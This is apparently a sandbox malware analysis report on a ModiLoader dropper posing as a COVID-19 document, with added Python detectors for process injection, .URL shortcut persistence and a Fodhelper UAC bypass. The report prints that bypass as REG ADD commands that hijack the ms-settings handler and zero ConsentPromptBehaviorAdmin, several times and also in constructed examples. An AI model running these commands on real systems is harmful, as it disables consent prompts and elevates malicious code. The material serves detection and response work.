

Analysis Report Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe

Overview

General Information

Sample Name: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe
Analysis ID: 294445
MD5: bf1d56457c41d52ccfdf550e31282732
SHA1: fda35ca446867fe06cd7083872b3727afa29bd85
SHA256: 8f3b6a725b06abd223aa214244ba4756cba52419dd116506744c386133a805fe
Tags: exe, ModiLoader


Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Startup

  • System is w10x64
  • Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe (PID: 5852 cmdline: 'C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
    • notepad.exe (PID: 1476 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6980 cmdline: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6032 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 5448 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
  • Xbuhnek.exe (PID: 5488 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
  • cleanup
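The process tree is the part of this report a responder acts on: the user-launched sample spawns notepad.exe, notepad.exe spawns cmd.exe twice to run C:\Users\Public\Natso.bat, reg.exe is called from that batch, ieinstal.exe is started by the sample as a second host, and a copy of the sample with the same MD5 runs from AppData as Xbuhnek.exe. The Python below is an added example, not part of the Joe Sandbox report, that transcribes the tree into records and applies three heuristics a detection engineer would derive from it: a GUI host (notepad.exe, ieinstal.exe) spawning a console or scripting child, a process whose hash equals the submitted sample but runs from another path, and a command line that executes something from a user-writable directory. The set of quiet GUI hosts and the user-writable path pattern are assumptions.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]  # None for a root of the tree
    image: str
    cmdline: str
    md5: str


SUBMITTED_IMAGE = r"C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe"
SUBMITTED_MD5 = "BF1D56457C41D52CCFDF550E31282732"
DROPPED_COPY = r"C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe"

# Process records transcribed from the Startup tree of the report above.
TREE: List[Proc] = [
    Proc(5852, None, SUBMITTED_IMAGE, f"'{SUBMITTED_IMAGE}'", SUBMITTED_MD5),
    Proc(1476, 5852, r"C:\Windows\System32\Notepad.exe", r"C:\Windows\System32\Notepad.exe",
         "D693F13FE3AA2010B854C4C60671B8E2"),
    Proc(3152, 1476, r"C:\Windows\system32\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat", "F3BDBE3BB6F734E357235F4D5898582D"),
    Proc(6004, 3152, r"C:\Windows\system32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    Proc(6980, 3152, r"C:\Windows\SysWOW64\reg.exe",
         r"REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ "
         r"/d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion"
         r"\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f",
         "CEE2A7E57DF2A159A065A34913A055C2"),
    Proc(3788, 1476, r"C:\Windows\system32\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat", "F3BDBE3BB6F734E357235F4D5898582D"),
    Proc(5700, 3788, r"C:\Windows\system32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    Proc(6032, 5852, r"C:\Program Files (x86)\internet explorer\ieinstal.exe",
         r"C:\Program Files (x86)\internet explorer\ieinstal.exe", "DAD17AB737E680C47C8A44CBB95EE67E"),
    Proc(5448, None, DROPPED_COPY, f"'{DROPPED_COPY}'", SUBMITTED_MD5),
    Proc(5488, None, DROPPED_COPY, f"'{DROPPED_COPY}'", SUBMITTED_MD5),
]

# Assumption: GUI programs that have no legitimate reason to spawn a console or scripting child.
QUIET_GUI_HOSTS = {"notepad.exe", "ieinstal.exe"}
CONSOLE_CHILDREN = {"cmd.exe", "powershell.exe", "reg.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories every interactive user can write to: C:\Users\Public and any user's AppData.
USER_WRITABLE = re.compile(r"C:\\Users\\(Public|[^\\]+\\AppData)\\", re.IGNORECASE)


def _name(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def find_anomalies(tree: List[Proc], submitted_image: str, submitted_md5: str) -> List[Tuple[str, int]]:
    """Return (finding, pid) pairs; each process is tested against the three heuristics in turn."""
    by_pid = {p.pid: p for p in tree}
    findings: List[Tuple[str, int]] = []
    for p in tree:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        # 1. notepad.exe launching cmd.exe is the footprint of code injected into the editor.
        if parent is not None and _name(parent.image) in QUIET_GUI_HOSTS and _name(p.image) in CONSOLE_CHILDREN:
            findings.append(("gui_host_spawns_console", p.pid))
        # 2. Same hash as the submitted sample but a different path: the loader copied itself.
        if p.md5.upper() == submitted_md5.upper() and p.image.lower() != submitted_image.lower():
            findings.append(("self_copy_of_sample", p.pid))
        # 3. The command line runs something out of a user-writable directory.
        if USER_WRITABLE.search(p.cmdline):
            findings.append(("runs_from_user_writable_dir", p.pid))
    return findings


def descendants(tree: List[Proc], root_pid: int) -> List[int]:
    """Every pid below root_pid, breadth-first, so the whole chain can be killed or collected."""
    children = {}
    for p in tree:
        children.setdefault(p.ppid, []).append(p.pid)
    out, queue = [], list(children.get(root_pid, []))
    while queue:
        pid = queue.pop(0)
        out.append(pid)
        queue.extend(children.get(pid, []))
    return out


if __name__ == "__main__":
    for finding, pid in find_anomalies(TREE, SUBMITTED_IMAGE, SUBMITTED_MD5):
        print(f"{finding:28s} pid={pid}")
    print("descendants of 5852:", descendants(TREE, 5852))
```

The two Xbuhnek.exe roots have no recorded parent in the tree, which is consistent with a persistence mechanism starting them rather than the sample itself; the self-copy heuristic catches them by hash regardless of who launched them.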

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\hubX.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x187c:$file: URL=
  • 0x1860:$url_explicit: [InternetShortcut]
00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x18a8:$icon: IconFile=
  • 0x1860:$url_explicit: [InternetShortcut]
00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x11c0:$file: URL=
  • 0x11a4:$url_explicit: [InternetShortcut]
00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x11ec:$icon: IconFile=
  • 0x11a4:$url_explicit: [InternetShortcut]
00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x1c04:$file: URL=
  • 0x1be8:$url_explicit: [InternetShortcut]
(5 of 20 memory dump matches shown)
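The three Yara hits on hubX.url and on the sample's memory are Nick Carr's methodology rules for .URL shortcut persistence; the memory matches at offsets 0x11a4, 0x1860 and 0x1be8 show the shortcut body was assembled inside the sample's process before being written to disk. The report gives only the matched strings and their offsets, not the file contents. The Python below is an added example (neither the rule authors' Yara text nor code from this report) that parses an [InternetShortcut] file and re-implements what each of the three rules checks for: a non-zero HotKey, a URL= whose scheme is not http(s), and an IconFile that is not an .exe, .dll or .ico. Both shortcut bodies are constructed; the URL and IconFile values are assumptions chosen to resemble the dropped-file layout.

```python
import re
from pathlib import Path
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample. The report lists only rule strings and offsets for hubX.url, not its
# contents; the URL and IconFile values are assumptions chosen so that all three rules fire.
# The header is 18 bytes plus CRLF, which is why "URL=" lands at 0x14, the same offset the
# report shows for $file.
SUSPICIOUS_URL_FILE = (
    b"[InternetShortcut]\r\n"
    b"URL=file:///C:/Users/user/AppData/Local/Microsoft/Windows/Xbuhnek.exe\r\n"
    b"IconFile=C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Xbuhnek\r\n"
    b"IconIndex=0\r\n"
    b"HotKey=1\r\n"
)

# Constructed benign shortcut for contrast: https target, icon from a system DLL, no hotkey.
BENIGN_URL_FILE = (
    b"[InternetShortcut]\r\n"
    b"URL=https://www.example.com/\r\n"
    b"IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
    b"IconIndex=13\r\n"
)


def parse_internet_shortcut(data: bytes) -> Dict[str, str]:
    """Parse the INI-style .URL body into lower-cased key -> value; the header must sit at offset 0."""
    if not data.startswith(b"[InternetShortcut]"):  # the rules' "$url_explicit at 0" condition
        raise ValueError("not an [InternetShortcut] file")
    keys: Dict[str, str] = {}
    for line in data.decode("utf-8", errors="replace").splitlines():
        if "=" in line and not line.startswith("["):
            k, v = line.split("=", 1)
            keys[k.strip().lower()] = v.strip()
    return keys


def match_url_persistence_rules(data: bytes) -> List[str]:
    """Names of the methodology rules whose intent the shortcut matches.

    This re-implements what each rule looks for; it is not the authors' Yara text, whose
    exact regexes may differ in edge cases (assumption).
    """
    keys = parse_internet_shortcut(data)
    hits: List[str] = []
    # Rule 1: a non-zero HotKey binds the shortcut to a keystroke, so it can fire without a click.
    if re.search(rb"\x0aHotKey=[1-9]", data):
        hits.append("Methodology_Shortcut_HotKey")
    # Rule 2: URL= present but not http(s); file:, javascript: or a custom handler runs local code.
    url = keys.get("url")
    if url is not None and urlsplit(url).scheme.lower() not in ("http", "https"):
        hits.append("Methodology_Contains_Shortcut_OtherURIhandlers")
    # Rule 3: the icon does not come from an .exe, .dll or .ico, which is where real shortcut icons live.
    icon = keys.get("iconfile")
    if icon is not None and not icon.lower().endswith((".exe", ".dll", ".ico")):
        hits.append("Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO")
    return hits


def scan_for_url_persistence(root: Path) -> Dict[str, List[str]]:
    """Walk a profile directory and report every .URL file that trips at least one rule."""
    results: Dict[str, List[str]] = {}
    for path in root.rglob("*.url"):
        try:
            hits = match_url_persistence_rules(path.read_bytes())
        except (ValueError, OSError):
            continue  # not a shortcut, or unreadable
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    print(match_url_persistence_rules(SUSPICIOUS_URL_FILE))
    print(match_url_persistence_rules(BENIGN_URL_FILE))
```

The Yara rules declare their strings ascii wide, so a UTF-16 shortcut also matches in Yara; this parser handles only the single-byte form, so widen the header check before running scan_for_url_persistence over real profiles. Note also that hubX.url sits in AppData\Local rather than in a Startup folder, so a scan limited to Startup would miss it: run it over the whole profile.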

Sigma Overview

System Summary:

Sigma detected: Fodhelper UAC Bypass
Source: Process started | Author: Joe Security
Data:
  • Command: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
  • CommandLine: identical to Command
  • CommandLine|base64offset|contains: DA
  • Image: C:\Windows\SysWOW64\reg.exe
  • NewProcessName: C:\Windows\SysWOW64\reg.exe
  • OriginalFileName: C:\Windows\SysWOW64\reg.exe
  • ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
  • ParentImage: C:\Windows\SysWOW64\cmd.exe
  • ParentProcessId: 3152
  • ProcessCommandLine: identical to Command
  • ProcessId: 6980
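This event is the whole Fodhelper technique in one line. fodhelper.exe (like computerdefaults.exe) is an auto-elevating Microsoft binary that opens the ms-settings: protocol and resolves its handler from HKCU\Software\Classes, which a standard user can write, so whatever command is stored there runs at high integrity without a prompt. Here the stored command is itself a second REG ADD that sets ConsentPromptBehaviorAdmin to 0 under HKLM, which turns off consent prompts for administrators from then on. The Python below is an added detection example, not the Sigma rule and not from the report: it tokenises a process-creation command line, parses REG ADD, flags writes to the ms-settings and mscfile handler keys and to the UAC policy key, and analyses the stored handler command recursively so the nested policy change surfaces in the same alert. The first event is the report's command as rendered there; the other three are constructed (a textbook DelegateExecute sequence and a benign REG ADD from a fictional vendor), and the hijack-key and weak-value lists are assumptions.

```python
from typing import Dict, List, Optional, Tuple

# Handler keys whose default value an auto-elevating binary executes: fodhelper.exe and
# computerdefaults.exe open ms-settings:, eventvwr.exe opens mscfile. Assumption: the list
# is limited to these two well-known keys.
UAC_HIJACK_KEY_SUFFIXES = (r"\ms-settings\shell\open\command", r"\mscfile\shell\open\command")
UAC_POLICY_KEY = r"\microsoft\windows\currentversion\policies\system"
# Policy values that, set to 0, silence or disable UAC for administrators (assumption: this subset).
WEAK_UAC_VALUES = {"consentpromptbehavioradmin": "0", "enablelua": "0", "promptonsecuredesktop": "0"}

# (pid, image, command line). The first is the report's event; the other three are constructed.
EVENTS: List[Tuple[int, str, str]] = [
    (6980, r"C:\Windows\SysWOW64\reg.exe",
     r"REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ "
     r"/d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion"
     r"\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f"),
    (7001, r"C:\Windows\System32\reg.exe",
     r'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f'),
    (7002, r"C:\Windows\System32\reg.exe",
     r'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /t REG_SZ /d "C:\Users\Public\stage2.exe" /f'),
    (7003, r"C:\Windows\System32\reg.exe",
     r'reg add "HKCU\Software\Contoso\Editor" /v ShowToolbar /t REG_DWORD /d 1 /f'),
]


def split_cmdline(cmdline: str) -> List[str]:
    """Split on unquoted whitespace. Both ' and " delimit a run, since sandbox reports show
    single quotes where raw Sysmon/4688 data carries double quotes; backslashes are literal."""
    tokens: List[str] = []
    cur: List[str] = []
    quote: Optional[str] = None
    in_token = False
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur.append(ch)
        elif ch in "'\"":
            quote, in_token = ch, True  # an empty "" still yields a token
        elif ch.isspace():
            if in_token:
                tokens.append("".join(cur))
                cur, in_token = [], False
        else:
            cur.append(ch)
            in_token = True
    if in_token:
        tokens.append("".join(cur))
    return tokens


def parse_reg_add(tokens: List[str]) -> Optional[Dict[str, str]]:
    """Locate the first REG ADD in a token list and return its key, value name, type and data."""
    for i in range(len(tokens) - 2):
        if tokens[i].upper() == "REG" and tokens[i + 1].upper() == "ADD":
            cmd = {"key": tokens[i + 2], "value": "", "type": "REG_SZ", "data": ""}
            opts = tokens[i + 3:]
            j = 0
            while j < len(opts):
                flag = opts[j].lower()
                if flag in ("/v", "/t", "/d") and j + 1 < len(opts):
                    cmd[{"/v": "value", "/t": "type", "/d": "data"}[flag]] = opts[j + 1]
                    j += 2
                else:
                    j += 1  # /f, /ve, /reg:32 and anything else carry no operand we need
            return cmd
    return None


def analyze_cmdline(cmdline: str, depth: int = 0) -> List[str]:
    """Findings for one command line; a hijacked handler's stored command is analysed recursively."""
    cmd = parse_reg_add(split_cmdline(cmdline))
    if cmd is None:
        return []
    findings: List[str] = []
    key = cmd["key"].lower().strip("\\")
    if key.endswith(UAC_HIJACK_KEY_SUFFIXES):
        findings.append("uac_handler_hijack:" + cmd["key"])
        if cmd["value"].lower() == "delegateexecute":
            # An empty DelegateExecute makes the shell fall back to the (Default) command.
            findings.append("delegateexecute_set")
        elif cmd["data"] and depth < 3:
            # The default value is the command the auto-elevated binary will launch.
            findings.append("elevated_payload:" + cmd["data"])
            findings += ["payload>" + f for f in analyze_cmdline(cmd["data"], depth + 1)]
    if UAC_POLICY_KEY in key:
        name = cmd["value"].lower()
        if name in WEAK_UAC_VALUES and cmd["data"] == WEAK_UAC_VALUES[name]:
            findings.append("uac_policy_weakened:" + cmd["value"])
    return findings


def scan_events(events: List[Tuple[int, str, str]]) -> Dict[int, List[str]]:
    """pid -> findings for every event that produced at least one finding."""
    alerts: Dict[int, List[str]] = {}
    for pid, _image, cmdline in events:
        findings = analyze_cmdline(cmdline)
        if findings:
            alerts[pid] = findings
    return alerts


if __name__ == "__main__":
    for pid, findings in scan_events(EVENTS).items():
        print(pid, *findings, sep="\n    ")
```

The process tree in this report contains no fodhelper.exe launch, so in this run the handler was staged but the trigger is not recorded; alert on the handler write itself rather than waiting for an elevated child. During cleanup delete HKCU\Software\Classes\ms-settings entirely and confirm ConsentPromptBehaviorAdmin under the policy key is back at its Windows 10 default of 5.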

Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Metadefender: Detection: 18%
Multi AV Scanner detection for submitted file
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Metadefender: Detection: 18%

Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn | 6_2_5048518C
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 14_3_023E0B42
